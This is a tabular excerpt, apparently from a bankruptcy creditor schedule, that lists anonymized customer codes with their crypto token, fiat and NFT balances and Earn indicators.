| 07335326 | | TRX[81.1395498], USD[0.00] | | |
| 07335328 | | USD[10.00] | | |
| 07335329 | | BAT[1], BRZ[5], CUSDT[6], SUSHI[0], TRX[4], USD[0.00] | | |
| 07335330 | | BRZ[1], CUSDT[7], DOGE[7369.46616069], TRX[2003.00004438], USD[0.00] | | |
| 07335331 | | USD[10.00] | | |
| 07335333 | | CUSDT[2], DOGE[298.53881581], GRT[0.00027748], TRX[2], USD[1.49] | | |
| 07335334 | | BTC[0], DOGE[0], ETH[.00000001], NFT (3840845189025526010/Entrance Voucher #3636)[1], SOL[0.00000001], USD[0.01], USDT[0] | Yes | |
| 07335335 | | CUSDT[3274.54350028], DOGE[1460.0003085], TRX[707.87151078], USD[0.00] | | |
| 07335336 | | CUSDT[1], DOGE[141.87437626], USD[0.01] | | |
| 07335337 | | CUSDT[1], DOGE[1319.51533509], ETH[.02979571], ETHW[.02979571], TRX[1], USD[5.01], USDT[1] | | |
| 07335338 | | BAT[0], BRZ[0], DOGE[0], GRT[0], LTC[0], PAXG[0], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0.00022335] | | |
| 07335339 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07335340 | | USD[10.00] | | |
| 07335341 | | USD[10.00] | | |
| 07335342 | | BRZ[1], USD[0.01] | | |
| 07335343 | | DOGE[2523.43696271], SHIB[1], USD[0.00] | Yes | |
| 07335344 | | SHIB[1], USD[0.01] | | |
| 07335345 | | BAT[82.61863639], BRZ[70.04155898], CUSDT[806.26367323], DAI[21.87829679], DOGE[7204.96867784], GRT[83.78193869], KSHIB[34.81815955], LINK[.98767776], MKR[.00719987], PAXG[.00605385], SOL[2.25741842], SUSHI[1.39510335], TRX[349.15817795], UNI[.56530743], USD[0.81], USDT[24.15994533], YFI[.00154819] | Yes | |
| 07335346 | | BRZ[1], CUSDT[3], DOGE[505.61808553], SHIB[316403.76581611], TRX[3], USD[0.00] | | |
| 07335348 | | CUSDT[2], DOGE[888.75669455], ETH[.02563019], ETHW[.02563019], USD[0.00] | | |
| 07335349 | | DOGE[181.09259318], USD[0.00] | | |
| 07335350 | | USD[10.00] | | |
| 07335351 | | USD[10.00] | | |
| 07335352 | | USD[10.00] | | |
| 07335353 | | USD[10.00] | | |
| 07335354 | | USD[10.00] | | |
| 07335355 | | BTC[.00295417], DOGE[1], USD[10.00] | | |
| 07335356 | | CUSDT[1], DOGE[1], USD[0.08] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335357 | | USD[10.00] | | |
| 07335358 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07335359 | | USD[10.00] | | |
| 07335360 | | USD[0.00] | Yes | |
| 07335361 | | DOGE[144.8528111], NFT (469723988364118173/Saudi Arabia Ticket Stub #1412)[1], USD[0.00] | Yes | |
| 07335362 | | BAT[0], BRZ[2], CUSDT[5], USD[0.00], USDT[0] | | |
| 07335363 | | USD[0.01] | Yes | |
| 07335364 | | USD[10.00] | | |
| 07335365 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07335366 | | BCH[.00416851], BTC[.00004465], CAD[0.00], LINK[.03349907], USD[4.21] | | |
| 07335367 | | DOGE[1.00347707], USD[0.00], USDT[0] | | |
| 07335368 | | CUSDT[2], DOGE[1279.96804658], LINK[1.10850704], TRX[4], USD[0.00] | | |
| 07335369 | | CUSDT[3], DOGE[216.85028501], TRX[1], USD[0.00] | | |
| 07335370 | | USD[10.00] | | |
| 07335371 | | CUSDT[2], DOGE[2.07957218], LTC[.71174135], USD[0.00] | | |
| 07335372 | | USD[10.00] | | |
| 07335373 | | USD[0.00] | | |
| 07335374 | | BRZ[1], CUSDT[1], DOGE[423.51515213], TRX[1], USD[0.00] | | |
| 07335375 | | BTC[.00009231], DOGE[36.34764199], USD[1108.12] | Yes | |
| 07335376 | | BF_POINT[300], CUSDT[18.00003577], DOGE[13.74486518], ETH[0.00072938], ETHW[0.00072938], LINK[.0005395], LTC[.00079563], SHIB[263.85371357], SOL[.00105627], TRX[5], UNI[.00001694], USD[0.69] | | |
| 07335377 | | USD[10.00] | | |
| 07335378 | | USD[10.00] | | |
| 07335379 | | USD[10.00] | | |
| 07335380 | | BRZ[7.64507247], CUSDT[7], DOGE[22348.09358088], GRT[3.1485409], LINK[1.10981256], TRX[3], USD[0.61], USDT[2.21962547] | Yes | |
| 07335381 | | USD[10.00] | | |
| 07335382 | | BRZ[2], CUSDT[6], DOGE[12728.30714928], TRX[3154.77522764], USD[0.00] | Yes | |
| 07335384 | | USD[10.00] | | |
| 07335385 | | BRZ[2], CUSDT[1], DOGE[1], TRX[1], USD[0.11] | | |
| 07335386 | | DOGE[37.64237594], SHIB[1734052.29366963], USD[0.00] | | |
| 07335387 | | USD[10.00] | | |
| 07335388 | | ETH[0], USD[0.00] | | |
| 07335389 | | USD[0.00] | | |
| 07335390 | | DOGE[1595.31214423], USD[0.00] | | |
| 07335391 | | USD[5.00] | | |
| 07335392 | | DOGE[487.31957386], USD[14.24] | | |
| 07335393 | | CUSDT[2], DOGE[3.000548], ETHW[.37944558], SHIB[3], SOL[.00032568], TRX[1], USD[0.00] | Yes | |
| 07335396 | | USD[0.01] | | |
| 07335397 | | USD[10.00] | | |
| 07335398 | | DOGE[23556.32816812], USD[10.00] | | |
| 07335399 | | USD[10.00] | | |
| 07335400 | | USD[10.00] | | |
| 07335401 | | USD[10.00] | | |
| 07335402 | | USD[10.00] | | |
| 07335403 | | BTC[.00020954], CUSDT[1], DOGE[5802.29285097], LTC[.88876372], USD[0.00] | | |
| 07335404 | | USD[10.00] | | |
| 07335405 | | USD[0.00] | | |
| 07335406 | | BTC[.00020466], CUSDT[3], DOGE[543.12016327], ETH[.00799363], ETHW[.00789787], TRX[2], USD[0.00] | Yes | |
| 07335407 | | USD[0.00] | | |
| 07335408 | | USD[0.00] | | |
| 07335409 | | CUSDT[2], DOGE[1570.28819779], SHIB[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07335410 | | DOGE[1], USD[0.00] | | |
| 07335411 | | DOGE[152.15537985], USD[0.00] | | |
| 07335412 | | BTC[.00019958], CUSDT[2], USD[20.68] | | |
| 07335413 | | USD[10.00] | | |
| 07335414 | | CUSDT[1], DOGE[15607.40752533], USD[10.00] | | |
| 07335415 | | BRZ[2], BTC[0], CUSDT[3], DOGE[0], ETH[0], ETHW[0], GRT[2], LINK[0], LTC[0], SUSHI[0], USD[0.01], USDT[1] | | |
| 07335416 | | USD[10.00] | | |
| 07335417 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335418 | | BRZ[5.05388087], CUSDT[11], DOGE[7.30313094], ETHW[1.58704199], GRT[3.09458915], LINK[12.84400973], SUSHI[20.30663167], TRX[6], UNI[14.69758202], USD[1725.38] | Yes | |
| 07335419 | | BTC[.00028945], CUSDT[2], DOGE[48.16226057], USD[0.00] | Yes | |
| 07335420 | | DOGE[1.02825797], SOL[36.22616012], TRX[1], USD[-98.56] | | |
| 07335421 | | DOGE[25.97316312], USD[0.00] | | |
| 07335422 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07335423 | | USD[10.00] | | |
| 07335424 | | USD[10.00] | | |
| 07335425 | | USD[2.34] | | |
| 07335427 | | CUSDT[3], DOGE[.34301475], USD[0.00] | Yes | |
| 07335428 | | USD[10.00] | | |
| 07335429 | | DOGE[165.73821234], USD[0.00] | | |
| 07335430 | | CUSDT[3], DOGE[1758.68583994], USD[0.00] | | |
| 07335432 | | USD[10.00] | | |
| 07335433 | | CUSDT[2], DOGE[0], TRX[544.10683896], USD[0.00] | Yes | |
| 07335434 | | BRZ[0], TRX[1], USD[0.00] | | |
| 07335435 | | USD[10.00] | | |
| 07335436 | | CUSDT[1], USD[0.01] | | |
| 07335437 | | USD[10.00] | | |
| 07335438 | | CUSDT[1], DOGE[67.94179141], USD[0.00] | | |
| 07335439 | | CUSDT[2], ETH[1.10703059], ETHW[1.10656553], LTC[1.80646828], TRX[68.22840151], USD[0.22] | Yes | |
| 07335440 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07335441 | | BAT[3.26776882], BRZ[5.07952967], CUSDT[14], ETH[.00000592], ETHW[.00000592], GRT[2.06378118], MATIC[.75817226], SOL[.02829484], TRX[3.98701485], USD[0.00] | Yes | |
| 07335442 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07335443 | | USD[10.00] | | |
| 07335444 | | USD[10.00] | | |
| 07335445 | | USD[10.00] | | |
| 07335446 | | CUSDT[4], DOGE[.05566883], TRX[1], USD[0.00] | | |
| 07335447 | | DOGE[2229.78786007], TRX[2], USD[10.00] | | |
| 07335448 | | DOGE[1.00003829], USD[0.01] | | |
| 07335450 | | CUSDT[1], USD[0.01] | | |
| 07335451 | | USD[10.00] | | |
| 07335452 | | USD[10.00] | | |
| 07335453 | | CUSDT[5], USD[67.91] | | |
| 07335454 | | CUSDT[1], TRX[1.32499259], USD[0.01] | Yes | |
| 07335455 | | USD[10.00] | | |
| 07335456 | | BTC[0.00430510], DOGE[3], GRT[8.39006872], KSHIB[2388.91200824], SHIB[4], TRX[761.54124002], USD[0.37], USDT[1.11043116] | Yes | |
| 07335457 | | BAT[.00002774], BTC[0.00014031], DOGE[0.00768110], LTC[0.00000049], TRX[0.01005731], USD[0.00] | | |
| 07335458 | | USD[10.00] | | |
| 07335459 | | USD[10.00] | | |
| 07335460 | | USD[10.00] | | |
| 07335461 | | USD[0.00] | | |
| 07335462 | | BTC[0], DOGE[0], TRX[1], USD[0.00] | | |
| 07335463 | | USD[10.00] | | |
| 07335464 | | USD[10.00] | | |
| 07335465 | | USD[10.00] | | |
| 07335466 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07335467 | | USD[10.00] | | |
| 07335468 | | USD[10.00] | | |
| 07335469 | | BRZ[.00028641], CUSDT[3], GRT[4.08423361], MATIC[.00006022], TRX[43.47032195], USD[1.78] | Yes | |
| 07335470 | | BAT[23.82941285], CUSDT[8], DOGE[80.51033239], MATIC[8.77404814], SOL[1.43883112], SUSHI[1.37346649], TRX[235.38942045], USD[0.00], USDT[4.97949254] | | |
| 07335471 | | USD[10.00] | | |
| 07335472 | | USD[10.00] | | |
| 07335473 | | TRX[7.50955058], USD[0.00] | | |
| 07335474 | | TRX[1], USD[0.00] | | |
| 07335475 | | SHIB[1], USD[7.64] | | |
| 07335476 | | USD[0.00] | | |
| 07335477 | | USD[10.00] | | |
| 07335478 | | DOGE[585.08011312], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335479 | | USD[10.00] | | |
| 07335480 | | USD[10.00] | | |
| 07335481 | | BAT[0], DOGE[0], ETH[0], MATIC[0], SHIB[0], TRX[0], USD[0.00] | Yes | |
| 07335482 | | DOGE[35.62020068], SHIB[27974.70102311], TRX[1], USD[0.00], USDT[1] | | |
| 07335483 | | USD[10.00] | | |
| 07335484 | | CUSDT[4], DOGE[180.81338866], USD[0.01] | | |
| 07335485 | | DOGE[20.80617894], USD[0.00] | | |
| 07335486 | | DOGE[670.28001785], TRX[1], USD[0.00] | | |
| 07335487 | | USD[10.00] | | |
| 07335488 | | USD[10.00] | | |
| 07335489 | | DOGE[193.88171354], USD[0.00] | | |
| 07335490 | | BTC[0], CUSDT[2], TRX[2], USD[0.01] | | |
| 07335491 | | DOGE[17003.43410160], ETH[.0368637], ETHW[.03640661], SHIB[6379968.89166066], USD[0.00], USDT[0] | Yes | |
| 07335492 | | USD[0.00] | | |
| 07335493 | | DOGE[.0380626], USD[0.00] | | |
| 07335494 | | ALGO[179.37553982], BRZ[1], CUSDT[9], DOGE[10141.48137539], GRT[1], SHIB[5465956.02704749], TRX[7], USD[0.00], USDT[1.07372298] | Yes | |
| 07335495 | | DOGE[1], USD[0.00] | Yes | |
| 07335496 | | USD[10.00] | | |
| 07335497 | | BRZ[2], CUSDT[4], DOGE[73.92221117], USD[0.60] | | |
| 07335498 | | DOGE[970.07977671], USD[0.00] | | |
| 07335499 | | DOGE[15598.70627967], TRX[2], USD[10.00] | | |
| 07335500 | | CUSDT[1.00072401], DOGE[70.86839202], ETH[.00257366], ETHW[.0025463], NFT (423260532247492962/CatFamilya #38)[1], NFT (438893199306550814/Panda#1 #9)[1], SHIB[496837.73672910], SOL[0.03916967], USD[0.00] | Yes | |
| 07335502 | | DOGE[8.44490557], USD[0.68] | | |
| 07335503 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07335504 | | USD[0.00] | | |
| 07335505 | | USD[10.00] | | |
| 07335506 | | USD[10.00] | | |
| 07335507 | | BTC[.01006162], DOGE[595.784], ETH[.2882286], ETHW[.2882286], SHIB[1000000], SUSHI[5.9601], TRX[.518], USD[2.97] | | |
| 07335508 | | DOGE[3], MATIC[94.60687448], SHIB[4], SOL[0], TRX[.00079146], UNI[0], USD[128.29], USDT[0] | Yes | |
| 07335509 | | DOGE[281.16225576], USD[0.00] | | |
| 07335510 | | USD[10.00] | | |
| 07335511 | | CUSDT[3], DAI[.00001864], USD[0.00] | | |
| 07335512 | | DOGE[46.5206291], USD[0.00] | | |
| 07335513 | | USD[10.00] | | |
| 07335514 | | BAT[1], BRZ[1], CUSDT[1], DOGE[2], TRX[1], USD[0.01] | | |
| 07335515 | | USD[10.00] | | |
| 07335516 | | TRX[104.70796607], USD[0.00] | Yes | |
| 07335517 | | USD[10.00] | | |
| 07335518 | | USD[10.00] | | |
| 07335520 | | BRZ[1], CUSDT[25], DOGE[406.20094576], NFT (450791956931763285/Australia Ticket Stub #710)[1], SHIB[2532662.0922447], TRX[79.81823688], USD[0.00] | Yes | |
| 07335521 | | BTC[.00025622], CUSDT[2], DOGE[253.53232233], USD[0.01] | | |
| 07335522 | | BRZ[0], DOGE[2923.62160965], SHIB[58465730.44220692], TRX[0], USD[1126.32] | Yes | |
| 07335523 | | BRZ[15.22503015], CUSDT[166.33477237], DOGE[9924.95546634], SHIB[1171300.76956148], TRX[14.3882258], USD[0.01], USDT[3.26248799] | Yes | |
| 07335524 | | USD[10.00] | | |
| 07335525 | | USD[10.00] | | |
| 07335526 | | BTC[0], ETH[.01380351], ETHW[.01380351], UNI[5.993], USD[6.29], USDT[0.00001157] | | |
| 07335527 | | USD[10.00] | | |
| 07335528 | | DOGE[.00000863], TRX[1], USD[0.01] | | |
| 07335529 | | USD[10.00] | | |
| 07335530 | | USD[10.00] | | |
| 07335531 | | ETH[.00363071], ETHW[.00363071], USD[0.00] | | |
| 07335532 | | USD[10.00] | | |
| 07335533 | | USD[10.00] | | |
| 07335534 | | BRZ[3], DOGE[.00851041], ETH[0], ETHW[0], MATIC[.00009737], NFT (331118860381127864/Crystal Face #25)[1], NFT (334402285126856594/Magic Mushroom #2)[1], NFT (340520950704558648/Magic Mushroom #4)[1], NFT (467294362649684433/Magic Mushroom #3)[1], NFT (486534176086970252/Magic Mushroom #5)[1], NFT (490957114145064447/Magic Mushroom #6)[1], NFT (503554600470075842/Magic Mushroom )[1], NFT (507331128258170354/Magic Mushroom #7)[1], NFT (544702158758779627/BIGNOSE #04)[1], SOL[.00000502], TRX[2], USD[0.00], USDT[0.00004596] | Yes | |
| 07335535 | | USD[0.03] | | |
| 07335536 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335537 | | USD[0.00] | | |
| 07335538 | | CUSDT[4], DOGE[662.29607333], TRX[439.32460846], USD[0.00] | | |
| 07335539 | | BRZ[.66977121], CUSDT[329.09335835], DOGE[2], HKD[0.00], KSHIB[5.54642054], NFT (31073628477552021/Nobu Sensei #475)[1], NFT (32981237400198687 1/The CaLabs #34)[1], NFT (365234342569889372/Sigma Shark #1215)[1], NFT (469890276218615217/Ghoulie #6817)[1], NFT (486694861289005477/South Africa #4)[1], NFT (493482346442343188/Autumn 2021 #1256)[1], NFT (545447886098423537/ApexDucks Halloween #101)[1], SHIB[529357.06101857], SOL[.00871174], TRX[1.95058163], USD[0.00], USDT[0.00506542], ZAR[0.08] | Yes | |
| 07335540 | | BCH[0], BTC[0], ETH[.00256986], ETHW[.00256986], USD[0.00] | | |
| 07335541 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07335542 | | ETH[.00365859], ETHW[.00365859], USD[0.00] | | |
| 07335544 | | DOGE[69.92143782], USD[15.00] | | |
| 07335545 | | DOGE[139.63295801], USD[0.00] | | |
| 07335546 | | USD[0.00] | | |
| 07335547 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07335549 | | BAT[1], BRZ[5], BTC[0], CUSDT[3], DOGE[1], GRT[1], TRX[7], USD[198.63] | | |
| 07335550 | | USD[10.00] | | |
| 07335551 | | USD[10.00] | | |
| 07335552 | | USD[10.00] | | |
| 07335553 | | DOGE[83.78193707], USD[6.03] | | |
| 07335554 | | USD[0.00] | Yes | |
| 07335555 | | USD[10.00] | | |
| 07335556 | | BRZ[69.39504403], TRX[0], USD[0.00] | Yes | |
| 07335557 | | USD[10.00] | | |
| 07335558 | | USD[10.00] | | |
| 07335560 | | CUSDT[1], DOGE[.11804102], USD[0.74] | | |
| 07335561 | | CUSDT[2], DOGE[210.55581339], USD[0.00] | | |
| 07335562 | | BAT[63.72875248], BTC[.00060511], DOGE[2634.16138058], TRX[590.45680099], USD[0.00] | | |
| 07335563 | | USD[2.94] | | |
| 07335564 | | DOGE[1], USD[0.11], USDT[0] | | |
| 07335565 | | CUSDT[1], DOGE[.00003752], TRX[2], USD[0.00] | | |
| 07335566 | | USD[10.00] | | |
| 07335567 | | BRZ[1], BTC[.00018066], DOGE[.00003477], TRX[1], USD[0.00] | | |
| 07335568 | | BAT[8.3526602], BRZ[178.98067512], BTC[.00226043], CUSDT[23], DAI[10.99802111], DOGE[1684.90085935], ETH[.02842647], ETHW[.02807079], KSHIB[1342.57778694], LTC[1.09042075], MATIC[41.53717037], NFT (534250425944485781/FTX - Off The Grid Miami #1350)[1], SHIB[1584964.70800208], SOL[2.46169692], SUSHI[13.60407156], TRX[529.07603559], UNI[5.96132372], USD[0.06], USDT[55.19894406] | Yes | |
| 07335569 | | USD[10.00] | | |
| 07335570 | | BTC[0], SOL[3.54883899], TRX[1], USD[0.00] | | |
| 07335571 | | USD[0.00] | | |
| 07335572 | | USD[10.00] | | |
| 07335573 | | USD[0.01] | | |
| 07335574 | | CUSDT[2], DOGE[2868.56620248], USD[0.00] | | |
| 07335575 | | USD[0.00] | | |
| 07335576 | | USD[10.00] | | |
| 07335577 | | CUSDT[1], USD[854.64] | | |
| 07335578 | | BRZ[1], TRX[1], USD[0.00] | Yes | |
| 07335579 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0], USD[0.00] | | |
| 07335580 | | BCH[0], BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07335581 | | CUSDT[1], DOGE[701.75997525], USD[0.00] | Yes | |
| 07335582 | | USD[10.00] | | |
| 07335583 | | DOGE[70.26008597], USD[5.00] | | |
| 07335584 | | USD[10.00] | | |
| 07335585 | | USD[10.94] | Yes | |
| 07335586 | | CUSDT[3], DOGE[117.59379774], GRT[.74240468], TRX[1], USD[0.00] | | |
| 07335587 | | USD[10.00] | | |
| 07335588 | | USD[10.00] | | |
| 07335589 | | USD[10.00] | | |
| 07335590 | | USD[0.00], USDT[9.94009976] | | |
| 07335591 | | USD[10.00] | | |
| 07335592 | | BAT[1], CUSDT[2], DOGE[432.42532542], TRX[1], USD[0.57] | | |
| 07335593 | | USD[0.00] | | |
| 07335594 | | USD[10.00] | | |
| 07335595 | | BTC[.00075705], SHIB[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335596 | | USD[10.00] | | |
| 07335597 | | BAT[2.09514307], BRZ[1], CUSDT[2], DOGE[2890.02957576], TRX[5], USD[0.00] | Yes | |
| 07335598 | | USD[10.00] | | |
| 07335599 | | DOGE[3.53126388], USD[0.00] | Yes | |
| 07335600 | | BTC[.00017857], USD[0.00] | | |
| 07335602 | | USD[10.00] | | |
| 07335603 | | CUSDT[2], USD[5.43] | Yes | |
| 07335604 | | BF_POINT[200], DOGE[0], SHIB[36370.7972457], USD[0.00] | Yes | |
| 07335605 | | DOGE[149.08446108], USD[0.00] | Yes | |
| 07335606 | | USD[0.00] | | |
| 07335607 | | DOGE[2], USD[10.98] | | |
| 07335608 | | USD[0.00] | | |
| 07335609 | | USD[10.00] | | |
| 07335610 | | DOGE[20.44406972], TRX[1], USD[2.00] | | |
| 07335611 | | CUSDT[4], DOGE[1.09313115], MATIC[94.51983162], TRX[1], UNI[5.75965763], USD[559.37], USDT[1] | | |
| 07335612 | | BTC[0.00065482], CUSDT[1], DOGE[483.01392098], TRX[724.75820936], USD[0.00] | Yes | |
| 07335613 | | BRZ[4], CUSDT[3], GRT[135.78004678], LINK[0], SUSHI[12.31809527], TRX[1688.98492918], UNI[1.34513566], USD[0.00] | | |
| 07335614 | | BRZ[2], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07335615 | | DOGE[1.00002699], USD[0.45] | | |
| 07335616 | | BRZ[2], CUSDT[3], GRT[1.00498957], LTC[.62705193], TRX[2], USD[0.01] | Yes | |
| 07335617 | | BTC[.00086104], CUSDT[1], DOGE[9.41453172], GRT[.00000001], LINK[.01850976], SHIB[1], TRX[.00100467], USD[0.01] | Yes | |
| 07335618 | | BTC[.01], USD[10.00] | | |
| 07335619 | | USD[0.93] | | |
| 07335620 | | TRX[73.7393031], USD[0.00] | | |
| 07335621 | | USD[10.00] | | |
| 07335622 | | CUSDT[2], DOGE[1720.34997189], USD[0.00] | | |
| 07335623 | | BTC[0.00001543], CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07335624 | | DOGE[151.60843664], USD[0.00] | | |
| 07335625 | | USD[10.00] | | |
| 07335627 | | DOGE[5981.60545853], USD[20.00] | | |
| 07335628 | | USD[0.00], USDT[0] | | |
| 07335629 | | DOGE[239.45625968], SHIB[1], USD[200.00] | | |
| 07335630 | | USD[10.00] | | |
| 07335631 | | DOGE[2], ETH[0], GRT[0], SOL[0], TRX[2], USD[0.02], USDT[0] | Yes | |
| 07335633 | | USD[0.17] | | |
| 07335634 | | BAT[1], BRZ[1], CUSDT[7], TRX[5], USD[0.00] | | |
| 07335637 | | USD[10.00] | | |
| 07335638 | | USD[10.00] | | |
| 07335639 | | USD[10.00] | | |
| 07335640 | | MATIC[7.78713841], USD[0.00] | Yes | |
| 07335641 | | CUSDT[1], DOGE[296.79588568], USD[0.01] | | |
| 07335642 | | DOGE[137.78925409], USD[0.00] | | |
| 07335643 | | CUSDT[4], TRX[1], USD[8.42] | | |
| 07335644 | | USD[10.00] | | |
| 07335645 | | BRZ[1], CUSDT[14], DOGE[275.43496001], TRX[4], USD[428.93] | | |
| 07335646 | | DOGE[29268.41530941], USD[10.00] | | |
| 07335647 | | USD[0.00], USDT[0] | Yes | |
| 07335648 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07335649 | | DOGE[1.19292046], USD[0.52] | | |
| 07335650 | | DOGE[.00042916], USD[0.00] | Yes | |
| 07335652 | | USD[10.00] | | |
| 07335653 | | USD[10.00] | | |
| 07335654 | | USD[10.00] | | |
| 07335655 | | USD[10.00] | | |
| 07335656 | | USD[10.00] | | |
| 07335657 | | USD[0.02] | Yes | |
| 07335658 | | DOGE[1], USD[34.09] | | |
| 07335659 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335660 | | USD[10.18], USDT[0] | | |
| 07335661 | | ETH[.0009], ETHW[.0009], SOL[.94150949], USD[0.01] | | |
| 07335662 | | USD[10.00] | | |
| 07335663 | | GRT[90.4270379], USD[0.00] | Yes | |
| 07335664 | | USD[10.00] | | |
| 07335665 | | BTC[0], DOGE[0], LTC[0], SUSHI[.02274777], USD[0.00] | Yes | |
| 07335666 | | BRZ[3], BTC[.00082136], CUSDT[3], DOGE[104.05133991], USD[0.59] | | |
| 07335667 | | DOGE[219.33163896], USD[11.66] | | |
| 07335668 | | TRX[2], USD[0.00] | | |
| 07335669 | | BRZ[1], CUSDT[4], TRX[2], USD[0.01] | | |
| 07335670 | | USD[10.00] | | |
| 07335671 | | USD[10.00] | | |
| 07335672 | | BTC[.00005832], USD[10.00] | | |
| 07335673 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07335674 | | USD[10.00] | | |
| 07335676 | | USD[10.00] | | |
| 07335677 | | USD[10.00] | | |
| 07335678 | | BRZ[2], CUSDT[5], DOGE[14.60321569], TRX[4], USD[0.01], USDT[1] | | |
| 07335679 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0.24487876], TRX[1], USD[0.16] | | |
| 07335680 | | USD[10.00] | | |
| 07335681 | | USD[0.01] | | |
| 07335682 | | BRZ[3], CUSDT[5], DOGE[1], ETH[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07335683 | | USD[10.00] | | |
| 07335684 | | USD[10.00] | | |
| 07335685 | | USD[10.00] | | |
| 07335686 | | USD[0.16] | | |
| 07335687 | | TRX[1], USD[0.00] | | |
| 07335688 | | USD[0.00] | | |
| 07335689 | | DOGE[1.04934961], USD[0.00] | | |
| 07335690 | | USD[10.00] | | |
| 07335691 | | BRZ[1], CUSDT[5], DOGE[.02314479], TRX[1], USD[0.00], USDT[1] | | |
| 07335692 | | BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0] | | |
| 07335693 | | BAT[1.0165555], BRZ[1], BTC[.0000011], CUSDT[6], DOGE[26823.36089913], ETH[.00000109], ETHW[.00000109], NFT (526789138135847740/Warriors 75th Anniversary Icon Edition Diamond #894)[1], TRX[3], USD[0.00] | Yes | |
| 07335694 | | DOGE[3.00001734], USD[0.00] | | |
| 07335695 | | DOGE[141.30636056], USD[0.06] | | |
| 07335696 | | DOGE[2], MATIC[56.63455886], SHIB[1], USD[0.00] | Yes | |
| 07335698 | | USD[10.00] | | |
| 07335699 | | BRZ[0], BTC[0], DOGE[0], TRX[2], USD[0.01], USDT[0] | | |
| 07335700 | | USD[0.01] | | |
| 07335701 | | TRX[1], USD[0.01] | | |
| 07335702 | | USD[0.00] | | |
| 07335703 | | BAT[2], BTC[0], CUSDT[5], DOGE[3], ETH[0], SHIB[1], SOL[0], TRX[6], USD[0.01], USDT[0.00000001] | | |
| 07335704 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07335705 | | USD[0.00] | | |
| 07335706 | | USD[10.00] | | |
| 07335707 | | USD[10.00] | | |
| 07335708 | | USD[10.00] | | |
| 07335709 | | DOGE[126.01395468], USD[0.00] | | |
| 07335710 | | DOGE[2.10731166], USD[0.09] | | |
| 07335712 | | USD[10.00] | | |
| 07335713 | | TRX[1], USD[8.52] | | |
| 07335714 | | ALGO[515.32114155], BTC[.0049033], ETH[.04442373], ETHW[.04442373], TRX[748.32495034], USD[60.37] | | |
| 07335716 | | DOGE[23.92377292], USD[0.00] | | |
| 07335717 | | CUSDT[3], DOGE[52.94804943], USD[1.63] | | |
| 07335718 | | USD[10.00] | | |
| 07335720 | | USD[10.00] | | |
| 07335721 | | USD[10.00] | | |
| 07335722 | | CUSDT[3], DOGE[2.00003375], GRT[2.04972186], SUSHI[1.08502924], TRX[3], USD[0.00], USDT[1.09997466] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335723 | | BTC[0.00000007], DOGE[.00000001], USD[0.00] | Yes | |
| 07335724 | | USD[10.00] | | |
| 07335725 | | DOGE[1], USD[0.07] | Yes | |
| 07335726 | | USD[0.00] | Yes | |
| 07335727 | | BAT[2], BRZ[2], CUSDT[3], DOGE[1], TRX[2], USD[0.00] | | |
| 07335728 | | USD[0.00] | | |
| 07335729 | | CUSDT[1], USD[0.01] | Yes | |
| 07335730 | | BTC[0], CUSDT[2], DOGE[0], LTC[0], MATIC[0], SHIB[4435.24929709], TRX[2], USD[0.00] | | |
| 07335731 | | BRZ[0], DOGE[2.30545897], TRX[0], USD[0.00] | | |
| 07335732 | | CUSDT[1], LTC[.05213409], USD[0.01] | | |
| 07335733 | | BRZ[1], CUSDT[4], DOGE[997.08621037], NFT (542438819191993585/Entrance Voucher #3286)[1], SHIB[2], USD[4437.68], USDT[1.00014608] | Yes | |
| 07335734 | | USD[10.00] | | |
| 07335735 | | ETH[.00506753], ETHW[.00506753], TRX[76.10988958], USD[0.00] | | |
| 07335736 | | USD[10.00] | | |
| 07335738 | | CUSDT[2], DOGE[.80768865], USD[0.57] | | |
